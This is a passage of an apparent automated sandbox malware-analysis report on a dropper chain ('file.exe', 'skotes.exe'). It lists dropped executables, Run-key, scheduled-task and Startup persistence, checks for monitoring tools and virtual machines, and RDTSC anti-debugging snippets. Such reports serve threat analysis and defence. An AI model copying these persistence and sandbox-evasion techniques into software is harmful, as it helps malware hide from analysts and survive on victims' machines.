                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017911001\67fbb282d1.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017905001\4dd01d90fc.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI51602\_decimal.pyd
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI51602\_hashlib.pyd
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe | File created: C:\Users\Public\Netstat\FuturreApp.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI51602\_queue.pyd
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe | File created: C:\Users\Public\Netstat\PCICHEK.DLL
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017919001\b8dc7af2d8.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[3].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017910001\fde98a8d0b.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017917001\7423465717.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[5].exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI51602\libcrypto-1_1.dll
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017912001\f7b3852b06.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\8ZVMneG[1].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017904001\97bf9e137e.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI51602\_socket.pyd
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI51602\_ctypes.pyd
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI51602\libffi-7.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI51602\libssl-1_1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile created: C:\Users\Public\Netstat\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017901001\a4439a2887.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017918001\d2256ee69b.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\_bz2.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017916001\UZAj8wc.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[4].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017908001\2c36247645.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UZAj8wc[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\python310.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile created: C:\Users\Public\Netstat\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile created: C:\Users\Public\Netstat\PCICL32.DLLJump to dropped file

                                Boot Survival

                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f8645e1e85.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 67fbb282d1.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fde98a8d0b.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f7b3852b06.exe
                                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Window searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Window searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Window searched: window name: Regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Window searched: window name: Filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
                                Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\skotes.job

                                Hooking and other Techniques for Hiding and Protection

                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 5_2_00007FF67AED5820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError, 5_2_00007FF67AED5820
                                Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\systeminfo.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\getmac.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\Public\Netstat\FuturreApp.exe Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_0-10625
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep graph_3-37315
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_2-9694
                                Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                                Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                                Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                                Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
                                Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe System information queried: FirmwareTableInformation
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe System information queried: FirmwareTableInformation
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe System information queried: FirmwareTableInformation
                                Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: skotes.exe, 00000003.00000002.7286155793.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.000000000137D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000003.5972263346.00000000013CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                                Source: skotes.exe, 00000003.00000002.7286155793.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.000000000137D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000003.5972263346.00000000013CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INTERNALNAMECFF EXPLORER.EXE
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 44F241 second address: 44F245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 44F245 second address: 44F268 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1660h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E60BA165Ch 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 435B8F second address: 435BAC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5E60CAC68Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 435BAC second address: 435BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007F5E60BA1656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jnp 00007F5E60BA1656h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop ecx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 435BC5 second address: 435BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 44E99C second address: 44E9BE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E60BA166Dh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 44EB1F second address: 44EB50 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E60CAC692h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E60CAC698h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4526EA second address: 45276C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a or esi, dword ptr [ebp+122D1F92h] 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 add ecx, 38E5171Ah 0x0000001a movsx edx, di 0x0000001d push 00000003h 0x0000001f or dword ptr [ebp+122D219Dh], ecx 0x00000025 push D5F63A53h 0x0000002a jnc 00007F5E60BA165Ch 0x00000030 xor dword ptr [esp], 15F63A53h 0x00000037 mov dword ptr [ebp+122D1CA7h], ebx 0x0000003d lea ebx, dword ptr [ebp+124574F0h] 0x00000043 jmp 00007F5E60BA1669h 0x00000048 push eax 0x00000049 push ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F5E60BA1664h 0x00000051 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 45276C second address: 452770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 45293B second address: 452941 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 452941 second address: 452973 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E60CAC688h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F5E60CAC696h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 jc 00007F5E60CAC688h 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 463AE8 second address: 463AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 46FB28 second address: 46FB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
